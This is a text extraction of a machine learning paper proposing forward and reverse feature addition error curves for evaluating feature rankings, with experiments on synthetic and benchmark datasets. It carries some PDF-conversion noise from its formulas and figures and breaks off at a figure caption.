Joakim Nivre. 2013. Token and type constraints for cross-lingual part-of-speech tagging. Transactions of the Association for Computational Linguistics, 1:1–12. Sebastiaan A. Terwijn. 2002. On the learnability of hid- den Markov models. In Grammatical Inference: Al- gorithms and Applications, pages 261–268. Springer. Kristina Toutanova and Mark Johnson. 2007. A Bayesian LDA-based model for semi-supervised part- of-speech tagging. In Advances in Neural Information Processing Systems, pages 1521–1528. Stephen A. Vavasis. 2009. On the complexity of nonneg- ative matrix factorization. SIAM Journal on Optimiza- tion, 20(3):1364–1377. Tianyi Zhou, Jeff A. Bilmes, and Carlos Guestrin. 2014. Divide-and-conquer learning by anchoring a conical hull. In Advances in Neural Information Processing Systems, pages 1242–1250. 257 258 work_7hmcw6dxwjborfxvzwffuce4wq ---- Error curves for evaluating the quality of feature rankings Error curves for evaluating the quality of feature rankings Ivica Slavkov1, Matej Petković1,2, Pierre Geurts3, Dragi Kocev1,2 and Sašo Džeroski1,2 1 Jozef Stefan Institute, Ljubljana, Slovenia 2 Jozef Stefan International Postgraduate School, Ljubljana, Slovenia 3 Université de Liège, Liège, Belgium ABSTRACT In this article, we propose a method for evaluating feature ranking algorithms. A feature ranking algorithm estimates the importance of descriptive features when predicting the target variable, and the proposed method evaluates the correctness of these importance values by computing the error measures of two chains of predictive models. The models in the first chain are built on nested sets of top-ranked features, while the models in the other chain are built on nested sets of bottom ranked features. We investigate which predictive models are appropriate for building these chains, showing empirically that the proposed method gives meaningful results and can detect differences in feature ranking quality. This is first demonstrated on synthetic data, and then on several real-world classification benchmark problems. Subjects Algorithms and Analysis of Algorithms, Artificial Intelligence, Data Mining and Machine Learning Keywords Feature ranking, Error curves, Evaluation INTRODUCTION In the era of data abundance, we face high-dimensional problems increasingly often. Sometimes, prior to applying predictive modeling (e.g., classification) algorithms to such problems, dimensionality reduction may be necessary for a number of reasons, including computational reasons. By keeping only a limited number of descriptors (features), a classifier can also achieve better predictive performance, since typically, a portion of the features strongly influence the target variable, and the others can be understood as (mostly) noise. This dimensionality reduction corresponds to the task of feature selection (Guyon et al., 2002). A task related to it is feature ranking. This is a generalization of feature selection where, in addition to simply telling apart relevant features from irrelevant ones (Nilsson et al., 2007), one also assesses how relevant are they for predicting the target variable. In machine learning, feature ranking is typically seen either as a preprocessing or as a postprocessing step. In the former case, one actually tackles the feature selection problem by first computing the feature relevance values, and then keeping only the features whose relevance is above some user defined threshold. In the second case, feature ranking is obtained after building a predictive model in order to explain it, for example (Arceo- Vilas et al., 2020). For black box models, such as neural networks, this may be the only way to understand their predictions. How to cite this article Slavkov I, Petković M, Geurts P, Kocev D, Džeroski S. 2020. Error curves for evaluating the quality of feature rankings. PeerJ Comput. Sci. 6:e310 DOI 10.7717/peerj-cs.310 Submitted 12 August 2020 Accepted 1 October 2020 Published 7 December 2020 Corresponding author Matej Petković, matej.petkovic@ijs.si Academic editor Sebastian Ventura Additional Information and Declarations can be found on page 36 DOI 10.7717/peerj-cs.310 Copyright 2020 Slavkov et al. Distributed under Creative Commons CC-BY 4.0 http://dx.doi.org/10.7717/peerj-cs.310 mailto:matej.�petkovic@�ijs.�si https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.310 http://www.creativecommons.org/licenses/by/4.0/ http://www.creativecommons.org/licenses/by/4.0/ https://peerj.com/computer-science/ In some application domains, such as biology or medicine, feature ranking may be the main point of interest. If we are given data about the expression of numerous genes, for a group of patients, and the patients’ clinical state (diseased/healthy), one can find good candidate genes that influence the health status of the patients, which gives us a deeper understanding of the disease. Due to the prominence of the feature ranking task, there exist many feature ranking methods. Simpler methods assess the relevance of each feature independently ignoring the other features (χ2 statistics, mutual information of the feature and the target variable) and their possible interactions. A prominent example that shows the myopic nature of such approaches is the case when the target variable y is defined as y = XOR (x1, x2) where x1 and x2 are two binary features. Ignoring x1 when computing the relevance of x2 (and vice-versa) would result in assessing x1 as completely irrelevant, that is, as random noise. More sophisticated methods assess relevance of each feature in the context of the others. They are typically based on some predictive model, for example, Random Forest feature ranking (Breiman, 2001), or optimization problem (Nardone, Ciaramella & Staiano, 2019), but not necessarily, cf. for example, ReliefF (Robnik-Šikonja & Kononenko, 2003) and the work of Li & Gu (2015). However, there is no unified definition of feature importance, and actually, every feature ranking algorithm comes with its own (implicit) definition. Therefore, different methods typically introduce different feature importance scores: Deciding which of them is the best is a very relevant, but also very challenging task that we would like to address in this article. More precisely, we continue and extend our previous work (Slavkov et al., 2018), where we proposed and evaluated a quantitative score for the assessment of feature rankings. Here, we propose a new feature ranking evaluation method that can evaluate feature rankings in a relative sense (deciding which of the feature rankings is better), or in an absolute sense (assessing how good is a feature ranking). The method is based on constructing two chains of predictive models that are built from the top-ranked and bottom-ranked features. The predictive performances of the models in the chain are then shown on graphs of so called forward feature addition (FFA) and reverse feature addition (RFA) curves, which reveal how the relevant features are distributed in the ranking(s). An important property of the proposed method is that it does not need any prior ground truth knowledge of the data. We investigate the performance of the proposed evaluation approach under a range of scenarios. To begin with, we prove the potential of the FFA and RFA curves by using them in setting which employs synthetic data. Next, we investigate the use of different types of predictive models for constructing the curves, thus considerably extending the preliminary experiments by Slavkov et al. (2018). Furthermore, we apply the proposed evaluation approach to a large collection of benchmark datasets. Compared to Slavkov et al. (2018), we have included 11 new high-dimensional datasets. The results of the evaluation, in a nutshell, show that the FFA and RFA curves are able to discern the best ranking among multiple proposed feature rankings. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 2/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ The remainder of this article is organized as follows. “Related Work” outlines related work, “Method for Evaluating Feature Rankings” describes in detail the proposed method for constructing error curves. Next, “Empirical Evaluation of FFA/RFA Curve Properties” discusses the properties of the error curves when applied to synthetic data. We then give the results of the experimental evaluation on benchmark datasets in “Feature Ranking Comparison on Real-Worlds Datasets”. “Conclusions” concludes with a summary of our contributions and an outline of possible directions for further work. In the appendices, we give additional information about generating synthetic data (Appendix A1), measuring distance between rankings (Appendix A2), and comparative evaluation of feature ranking methods (Appendix A3). In Appendix A4, detailed experimental results are given. RELATED WORK The evaluation of feature rankings is a complex and unsolved problem. Typically, feature rankings are evaluated on artificially generated problems, while evaluation on real world problems remains an issue approached indirectly. To begin with, when the ground truth ranking is known, one can transform the problem of feature ranking evaluation into an evaluation of classification predictive model (Jong et al., 2004) as follows. First, a ranking is computed. Then, for every threshold, the numbers of relevant features (true positives) and irrelevant features (false positives) with the feature relevance above the threshold are computed. From these values, a ROC curve can be created and the area underneath it computed. Another possible approach is to compute separability (Robnik-Šikonja & Kononenko, 2003), that is, the minimal difference between the feature importance of a relevant feature and the feature importance of an irrelevant feature. If this difference is positive, then the relevant features are separated from the irrelevant ones, otherwise they are mixed. However, both approaches are more applicable to feature selection problems and are too coarse for feature rankings problem, since they only differentiate between relevant and irrelevant features. Spearman’s rank correlation coefficient between the computed and the ground truth ranking might be more appropriate. The main shortcoming of the upper approaches is that they demand the ground truth ranking. In real world scenarios, this is not known, which makes the upper approaches useless. Nevertheless, using synthetic data and the controlled environment offers a good starting point for showing the usefulness of a feature ranking evaluation method, as we shall also see later. An approach that overcomes the issue of unknown ground truth ranking bases on selecting k top-ranked features and building a predictive model that uses only these features to predict target variable. The ranking whose top-ranked features result in the model with the highest predictive performance, is proclaimed the best. Since it is now always clear which value of k should be chosen, this can be done for multiple values of k (Guyon et al., 2002; Furlanello et al., 2003; Paoli et al., 2005; Verikas, Gelzinis & Bacauskiene, 2011). Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 3/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ In addition to correctness, rankings stability is sometimes also part of the evaluation. The stability of a ranking algorithm can be measured by comparing the feature rankings obtained, for example, from the different bootstrap replicates of a dataset or from the folds in cross-validation (Guzmán-Martnez & Alaiz-Rodrguez, 2011; Kalousis, Prados & Hilario, 2007; Jurman et al., 2008). In Saeys, Abeel & De Peer (2008) both stability and predictive performance are combined into a single feature ranking quality index. Also, notions similar to FFA curves (without any particular name, though) as the feature ranking evaluation method can be found in the literature (Liu et al., 2003; Duch, Wieczorek & Biesiada, 2004; Biesiada et al., 2005; Liang, Yang & Winstanley, 2008). However, to the best of our knowledge, there is no discussion and detailed investigation why FFA curves are an appropriate method for comparing feature rankings, nor which learning methods should (or should not) be used for constructing them. A METHOD FOR EVALUATING FEATURE RANKINGS First of all, every feature ranking method should be able to tell apart relevant features from irrelevant ones (Nilsson et al., 2007). In addition to that, the method should order the features with respect to the target variable, awarding the most relevant ones the top ranks. If ground truth ranking exists, the method should return this ranking in the optimal case. The worst case is more complicated and has two possible answers. One is the inverse of the ground truth ranking. However, since the ground truth ranking is typically not known in real-world scenarios, a more useful definition of the worst ranking is random ranking. This ranking also contains as little information about the distribution of the relevant features in the ranking as possible. Moreover, this distribution can be always assessed and is the cornerstone of our ranking evaluation method. The evaluation method First, we define the notation used in the rest of the article: D denotes a dataset whose columns are input features Fi that form a set F, and the target feature Ft. A feature ranking method takes the dataset as an input, and returns a list R ¼ ðFð1Þ; . . . ; FðnÞÞ as the output, where F(i) is the feature with the rank i. We evaluate a ranking R by evaluating different subsets S of features F. This is done by building a predictive model MðS; FtÞ and assessing its predictive power. The evaluation of the predictive model provides a cumulative assessment of the information contained in the feature set S and it can be quantified with an error measure errðMðS; FtÞÞ. The question is how to generate the feature subsets from the feature ranking, so that the error estimates can provide insight into the correctness of the feature ranking and constitute an evaluation thereof. The construction of the feature subsets should be guided by the feature ranking R. Starting from the top ranked feature F(1) and going towards the bottom ranked feature F(n), the feature relevance should decrease. Following this basic intuition, we propose two methods for constructing feature subsets from the feature ranking: FFA and RFA. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 4/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Forward feature addition constructs the feature subsets Si by considering the i highest ranked features, starting with S1 = {F(1)}. The next set S i+1 is constructed by adding the next lower-ranked feature, namely Si+1 = Si ∪ {F(i+1)}. The process continues until i = n and Sn contains all of the features from R. Reverse feature addition produces feature sets Si constructed in an opposite manner to FFA. We start with S1 ¼ fFðnÞg that contains only the lowest ranked feature. The next feature set Si+1 is constructed by adding the lowest-ranked feature which is not in Si, namely Si+1 = Si ∪ {F(n−i)}. In the same way as for FFA, the process of RFA continues until we include all of the features, that is, Sn = F. Note that FFA can be viewed as backward feature elimination. Starting from Sn = F, at each step we remove the least relevant feature from Si to obtain Si−1. Similarly, RFA can be viewed as forward feature elimination. Finally, it holds that F = Sn−i ∪ Si for all i. For each i and each constructed feature subset Si or Si, we build predictive models MðSi; FtÞ and MðSi; FtÞ. We then estimate their respective prediction errors, erri and erri. This results in two error curves. We name them FFA and RFA curves, each constructed by the corresponding FFA/RFA feature subset construction method. The value for each point of the FFA curve is defined as FFA(i) = erri, while for the RFA curve as RFA(i) = erri. The process of FFA/RFA curve construction is summarized in Algorithm 1. The computational complexity of the proposed algorithm for constructing a single (FFA or RFA) curve is OðnðM þ TÞÞ, where n is the number of features, M = M(n) is the cost of constructing the predictive model and T = T(n) is the cost of its evaluation. It should be noted that M and T are dependent on the specific learning method used for inducing the model and on the procedure used for evaluating it. Typically, the points FFA(i), FFA(i + 1), ·, do not differ considerably, for i large enough, since it expected that only a small proportion of the features is relevant when the data is high-dimensional. This means that we can make the algorithm more efficient if we construct the set Si+δ(i) from the set Si by including δ(i) features into it. Analogously, we speed up the construction of the RFA curves. Algorithm 1 Generation of the FFA and RFA curves. Input: Feature Ranking R = (F(1),…,F(n)), Target Feature Ft, type of curve (FFA or RFA) S ) Ø E ) list of length n for i = 1,2, …,n do if curve type is FFA then S ) S ∪ {F(i)} else S ) S ∪ {F(n−i+1)} E[i] ) err (M(S, Ft)) return E Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 5/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Interpretation of error curves The visualization and interpretation of the FFA and RFA curves can be explained by considering the examples of FFA and RFA curves given in Fig. 1. The y-axis for both curves is the same and depicts the error estimate of a feature subset. Point i at the x-axis corresponds to the moment when the feature F(i) is first included in the predictive model: Si for the FFA curve and Sn−i+1 for the RFA curve. Thus, the FFA curve in Fig. 1 is constructed from left-to-right as the top-ranked features are at the beginning of the ranking. In contrast, the RFA curve is constructed from right-to-left starting with the end of the ranking and going towards its beginning. Let us first focus on the FFA curve. We can observe that as the number k of features increases, the accuracy of the predictive models also increases. This can be interpreted as follows: By adding more and more of the top-k ranked features, the number of relevant features in the constructed feature subsets increases, which is reflected in the improvement of the accuracy (error) measure. Next, for the RFA curve in Fig. 1, if we inspect it from right-to-left, we can notice that it is quite different from the FFA curve at the beginning. Namely, the accuracy of the models constructed with the bottom ranked features is minimal, which means the ranking is correct in the sense that it puts only irrelevant features at the bottom of the ranking. As the number of bottom-k features increases, some relevant features are included and the accuracy of the models increases. We now consider the complete Fig. 1. The FFA and RFA curve essentially provide an estimate of how the relevant features are spread throughout the feature ranking. Namely, the FFA curve provides us with an estimate of where the relevant features appear at the top of the ranking, while the RFA curve provides an estimate of where relevant ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 5 10 15 20 0 .5 0 .6 0 .7 0 .8 ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● FFA RFA Figure 1 Sample FFA and RFA curves. Full-size DOI: 10.7717/peerj-cs.310/fig-1 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 6/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-1 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ features appear at the bottom of the ranking. In the specific case depicted in Fig. 1, the relevant features are located between the 1st and the 13th ranked feature. Besides providing an estimate of the spread of the relevant features across the feature ranking, the real utility of the FFA/RFA curves becomes apparent if we consider them in a relative, or more precisely, a comparative context. Let us consider two arbitrary feature ranking methods rA and rB, which produce feature rankings RA and RB, respectively. For these two rankings, we present the corresponding FFA/RFA curves in Fig. 2. We first inspect the FFA curves visually. We find that the values of the FFA curve of the ranking method rA are (most of the time) above the FFA curve of the other ranking method rB. This can be interpreted in the following way: for an arbitrary k, when considering the top-k features of the feature rankings RA and RB, more relevant features are included in the top-k features of ranking RA than the top-k features of ranking RB. This implies that ranking algorithm rA produces a better ranking as compared to the ranking algorithm rB. A similar discussion applies to the RFA curve. When one considers the bottom-k features of a given feature ranking, most of the time, feature ranking RA includes less relevant features than feature ranking RB, that is, the predictive models constructed are less accurate. Here, because the opposite logic of the FFA curve applies, one can also conclude that the feature ranking algorithm rA produces a better feature ranking than the feature ranking algorithm rB. Expected FFA and RFA curves When one wants to assess the quality of a single feature ranking in a real-world application, its forward (reverse) feature addition curves can be only compared to the curves that belong the ranking, generated uniformly at random, since the ground-truth ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 5 10 15 20 0 .5 0 .6 0 .7 0 .8 ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● rA rB A ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● 5 10 15 20 0 .5 0 .6 0 .7 0 .8 ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● rA rB B Figure 2 Comparison of FFA curves (A) and RFA curves (B) of two ranking methods rA and rB. Full-size DOI: 10.7717/peerj-cs.310/fig-2 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 7/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-2 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ ranking is not known. As discussed before, the random ranking RRND is the worst-case ranking, since it contains no information about the distribution of the relevant features. As such, it can also serve as a baseline. The expected values of the points that define FFA curve of the ranking RRND coincide with the expected values of the RFA curve of this ranking, since the corresponding values only depend on the data itself and the number of features i at a given point of the curves. Thus, expected curves can be the common name for both types of the curves that belong to RRND. Computing the exact average error estimations ES½erri� ¼ ES½erri�, where S � F; jSj ¼ i, may be unfeasible if the number of features n is large (e.g., for i = n/2, Oðð2nÞ!=ðn!Þ2Þ models have to be evaluated), but one can overcome this by sampling the sets S. Stability of feature ranking An important aspect of feature ranking algorithms is their stability (Nogueira, Sechidis & Brown, 2017) or, more specifically, the stability of the ranked feature lists that they produce. Once we have the set R of m rankings Rt that were induced from the different samples of the dataset D, the stability index SðRÞ can be calculated as StðRÞ ¼ 1 m 2 � � Xm�1 t¼1 Xm s¼tþ1 SMðRt; RsÞ; that is, the stability index is the average of pairwise similarities SM for each pair of rankings. In general, the function SM can be any (dis)similarity measure, for example, the Spearman rank correlation coefficient (Saeys, Abeel & De Peer, 2008; Khoshgoftaar et al., 2013), the Jaccard distance (Saeys, Abeel & De Peer, 2008; Kalousis, Prados & Hilario, 2007), an adaptation of the Tanimoto distance (Kalousis, Prados & Hilario, 2007), Fuzzy (Goodman and Kruskal’s) gamma coefficient (Boucheham & Batouche, 2014, Henzgen & Hüllermeier, 2015), etc. To assess the stability of feature ranking in our experimental work, we set SM = Ca, where Ca is the Canberra distance (Lance & Williams, 1966; Lance & Williams, 1967; Jurman et al., 2008). This is a weighted distance metric that puts bigger emphasis on the stability of the top ranked features. If we have two feature rankings RA and RB of n features, then the Canberra distance is defined as CaðRA; RBÞ ¼ Xn j¼1 jrankAðFjÞ � rankBðFjÞj rankAðFjÞ þ rankBðFjÞ : (1) However, we do not only estimate the stability of the ranking as a whole. Rather, we also estimate the stability of the partial rankings based on the features from Si. In order for the distance to be applicable to such partial rankings with i < n features, the following adaptation is proposed: instead of using the ranks rankA, B(F), we use Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 8/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ rankiA;BðFÞ ¼ minfrankA;BðFÞ; i þ 1g, that is, all features with rank higher than i are treated as if they had rank i + 1: CaðRA; RBÞ ¼ Xn j¼1 jrankiAðFjÞ � rankiBðFjÞj rankiAðFjÞ þ rankiBðFjÞ : (2) Additionally, we would like the stability indicator to be independent of specific values of i and n. Hence, we normalize it by the expected Canberra distance between random rankings, denoted by Ca(n, i). It can be approximated (Jurman et al., 2008) as Caðn; iÞ � ði þ 1Þð2n � iÞ n log 4 þ ið1 þ iÞ n þ 2i � 3; (3) which we make use of when i ≥ 8 and the computation of the exact value becomes intractable. For i ≥ 8, the relative error of the approximation (3) is smaller than 1%. Our final stability indicator is thus the curve consisting of points calculated as i; StðSiÞ Caðn; iÞ � � ; (4) for 1 ≤ i ≤ n, that represent the relative change of distance between top-i lists w.r.t. the expected top-i distance. EMPIRICAL EVALUATION OF FFA/RFA CURVE PROPERTIES We start with the experiments on synthetic datasets. In such laboratory conditions, one has full control over the data, can establish the ground truth feature ranking, and produce rankings of different quality. Such a setting will facilitate proper assessment of our proposed feature ranking evaluation method. Before proceeding to the experiments, we briefly describe the constructed synthetic datasets. The detailed description of the datasets is given in “Appendix A1”. We construct three datasets named single, pair and combined. Each of them consists of 1,000 instances and 100 features. The relevant features in single dataset are individually correlated to target, the relevant features in the pair dataset are related to the target via XOR relation, and the relevant features in the combined dataset are the union of the relevant features in the single and pair datasets. The rest of the features in the datasets are random noise. Evaluation by randomising the ground truth ranking The appropriateness of the proposed method is first demonstrated on a family of feature rankings that contain more and more noise. By doing that, we can show that the lower and lower quality of feature rankings is reflected in the FFA and RFA curves, and thus detected by the method. We start with the ground-truth ranking RGT and perturb it as follows. First, we select a proportion θ of randomly selected features which are then assigned random relevances, drawn uniformly from the unit interval. The other features preserve their ground truth relevance. This results in a ranking Rθ. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 9/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Experimental setup We use the aforementioned single, pair and combined datasets. The following amounts θ of noise are introduced into the ground truth ranking: θ ∈ {0.05, 0.1, 0.15, 0.2, 0.3, 0.5, 1}. The value θ = 1 corresponds to a completely random ranking. For every value of θ, we estimate the expected values of the FFA/RFA curves that belong to the ranking Rθ, by first generating m = 100 realizations of the ranking, and second, (point-wise) averaging of the error estimates of the obtained predictive models. For constructing FFA/RFA curves, SVMs were used, as noted and justified at the end of the “Analysis of Different Learning Methods to Construct FFA and RFA Curves”. The curves were constructed via 10-times stratified 10-fold cross validation, using different random seeds. Results The obtained FFA and RFA curves are shown in Fig. 3 that gives the results for the dataset combined. The results for the datasets single and pair are similar. In addition to the curves that belong to the rankings Rθ with different amounts of noise, ground truth ranking is also shown. Both, FFA curves (Fig. 3A) and RFA curves (Fig. 3B) correctly detect different amount of noise θ: the higher the θ, the more distant are FFA and RFA curve of Rθ to the curves of ground truth ranking. The independent confirmation of these results are given in “Appendix A2”. Additionally, note that FFA curves cannot give all the information about the ranking: Had we not plotted the RFA curves in Fig. 3B, we would not have a proof that all of the rankings misplace some relevant features (check the considerable decrease in accuracy just before the 100th feature). ●● ●●●● ● ● ●●●●● ●●●●●● ●●●●●●●●●●●●● ● ●●● ●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ●● ●●●●●●●●● ●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ●●●●● ●●●●●●●●●●●●● ●●●●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ●●● ● ● ● ●● ●● ●● ●● ● ●●●●●● ●●●● ●●●● ●●●● ●●● ● ●● ● ●● ● ● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ground truth 5% noise 10% noise 15% noise 20% noise 30% noise 50% noise random A ● ● ● ● ●● ●● ●● ● ● ● ●● ●● ● ● ● ● ● ● ●●● ●●●● ●●● ●● ● ● ●●● ● ● ● ●●● ●●● ● ● ● ● ● ● ● ● ● ● ● 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●●●● ●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● ● ●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ● ● ● ● ● ● ● ● ●●● ●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●●● ● ●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ground truth 5% noise 10% noise 15% noise 20% noise 30% noise 50% noise random B Figure 3 Dataset combined: Forward feature addition curves (A), and reverse feature addition curves (B). The curves for the noisy rankings Rθ (0.05 ≤ q ≤ 1) and the ground truth ranking are shown. Full-size DOI: 10.7717/peerj-cs.310/fig-3 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 10/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-3 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ Analysis of different learning methods to construct FFA and RFA curves According to Algorithm 1, the error curve estimates depend not only on the feature ranking method, but also on the learning method used to construct the predictive models. In this section, we investigate which learning methods (learners) are suitable to construct the FFA and RFA curves. Note that we are not searching for a learner that would produce the most accurate predictive models. Rather, the requirement for the learner to be used in this context is that it should produce predictive models that exploit all the information that the features contain about the target concept, and can thus distinguish between feature rankings of different quality. Experimental setup When comparing the FFA and RFA curves of different ranking methods, constructed with different learners, we used the combined dataset described in detail in “Appendix 1”. We consider the following four feature ranking methods. Information gain, where we calculate the information gain of each feature Fi as IG(Ft,Fi) = H(Ft) − H(Ft :amp:mid; Fi). SVM-RFE uses a series of support vector machines (SVMs) to recursively compute a feature ranking. A linear SVM was employed, as proposed by (Guyon et al., 2002). Following (Slavkov et al., 2018), we set ε = 10−12 and c = 0.1. ReliefF algorithm as proposed by Robnik-Šikonja & Kononenko (2003). The number of neighbors was set to 10, and the number of iterations was set to 100%. Random Forests, which can be used for estimating feature relevance as described by Breiman (2001). A forest of 100 trees was used, constructed by randomly choosing rounded up log2 of the number of features. We compare the above ranking methods by using different learners to produce classifiers and generate error estimates for the FFA and RFA curves. More specifically, we consider Naïve Bayes (John & Langley, 1995); Decision Trees (Quinlan, 1993); Random Forests (Breiman, 2001): the number of trees was set to 100, and in each split log2 of the number of features are considered; SVMs (Cortes & Vapnik, 1995): a polynomial (quadratic) kernel was employed, with the ε = 10−12 and c = 0.1; k-NN (Aha & Kibler, 1991) with a value of k = 10. The curves were constructed via 10-times stratified 10-fold cross validation, using different random seeds. The obtained FFA and RFA curve comparisons of the four feature ranking methods obtained by each of the five learning methods, are presented in the following section. Results The rankings are shown in Fig. 4, where each graph represents the distribution of the ground truth relevance values. The y-axis depicts the ground truth relevance value (5). Each point, i, represents the i-th ranked feature, F(i), as determined by the feature ranking method. Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 11/39 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ We can see that the rankings fall into two groups: in Figs. 4A and 4B, highly relevant features are concentrated on the left, while in the Figs. 4C and 4D, they are evenly spread. ReliefF and Random Forests (Figs. 4A and 4B) are thus clearly better than Info Gain and SVM-RFE (Figs. 4C and 4D). Hence, the FFA and RFA curves should at least differentiate between the two groups of the rankings. However, there should be visible difference also between Relief and Random Forests at the beginning of the ranking. The detailed comparative evaluation of the obtained feature rankings is given in “Appendix A3”. In the case of FFA curves, the learners can be divided into two groups: FFA curves produced by Naïve Bayes, Decision Trees and Random Forests cannot capture any 1 6 12 19 26 33 40 47 54 61 68 75 82 89 96 feature ranking re le va n ce 0 .0 0 0 .0 5 0 .1 0 0 .1 5 0 .2 0 0 .2 5 A 1 6 12 19 26 33 40 47 54 61 68 75 82 89 96 feature ranking re le va n ce 0 .0 0 0 .0 5 0 .1 0 0 .1 5 0 .2 0 0 .2 5 B 1 6 12 19 26 33 40 47 54 61 68 75 82 89 96 feature ranking re le va n ce 0 .0 0 0 .0 5 0 .1 0 0 .1 5 0 .2 0 0 .2 5 C 1 6 12 19 26 33 40 47 54 61 68 75 82 89 96 feature ranking re le va n ce 0 .0 0 0 .0 5 0 .1 0 0 .1 5 0 .2 0 0 .2 5 D Figure 4 Distribution of relevant features for each of the four ranking methods: ReliefF (A), Random Forests (B), Info Gain (C) and SVM-RFE (D). Full-size DOI: 10.7717/peerj-cs.310/fig-4 Slavkov et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.310 12/39 http://dx.doi.org/10.7717/peerj-cs.310/fig-4 http://dx.doi.org/10.7717/peerj-cs.310 https://peerj.com/computer-science/ difference between rankings, whereas those produced by SVMs and k-NN can. It suffices to show one representative graph for each group (those for Naïve Bayes and k-NN are shown in Fig. 5), since there are no significant differences among the learning methods in the same group1. The FFA curves produced by these two learners have all the desirable properties: the curves for Relief and Random Forests are better than those of Info Gain and SVM-RFE. Additionally, at the beginning, the Random Forest curve is under the curve of Relief. 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●● ●● ● ●●●●●●●●●● ●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ●● ●● ●● ●●●●●●●●● ●●● ●●●●●●●●●●●●●●●●● ●●●●●●●●●●●●●●● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests reliefF SVM−RFE A 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ●● ●● ● ●●●● ● ● ● ●●●● ● ●● ● ●● ●● ●● ●● ● ● ●● ● ●● ● ● ● ●● ●●●● ● ● ● ●● ● ● ● ● ● ● ● ● ● ● ● ●● ●●● ●●●●●●●●●●●●● ● ●●●● ●● ●●● ●● ● ●●●● ●●●●●●● ●● ● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests reliefF SVM−RFE B Figure 5 Comparison of FFA curves for the four different ranking methods for the combined dataset. The curves were obtained by using the Naїve Bayes (A) and k-NN (B). Full-size DOI: 10.7717/peerj-cs.310/fig-5 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ●● ● ●●● ● ● ● ● ● ●● ● ● ●● ●● ●●● ● ● ●● ●●● ●●● ● ●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●● ●● ● ●● ● ● ● ●●● ●● ● ●● ●● ● ●● ●●●● ● ●● ●●● ● ● ●●●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests reliefF SVM−RFE A 0 20 40 60 80 100 0 .4 0 .5 0 .6 0 .7 0 .8 0 .9 feature ranking a cc u ra cy ● ● ● ● ● ● ● ● ● ● ● ●● ● ● ●● ●● ● ● ● ●● ● ● ●● ● ● ● ●● ● ● ●● ●● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ● ●●● ●● ● ● ● ● ● ● ● ● ●● ● ●●●● ● ● ● ● ●● ● ●● ● ●● ● ● ●● ● ● ●●● ● ● ● ● ● ● ● ● ● ● ● ● ● info gain random forests reliefF SVM−RFE B Figure 6 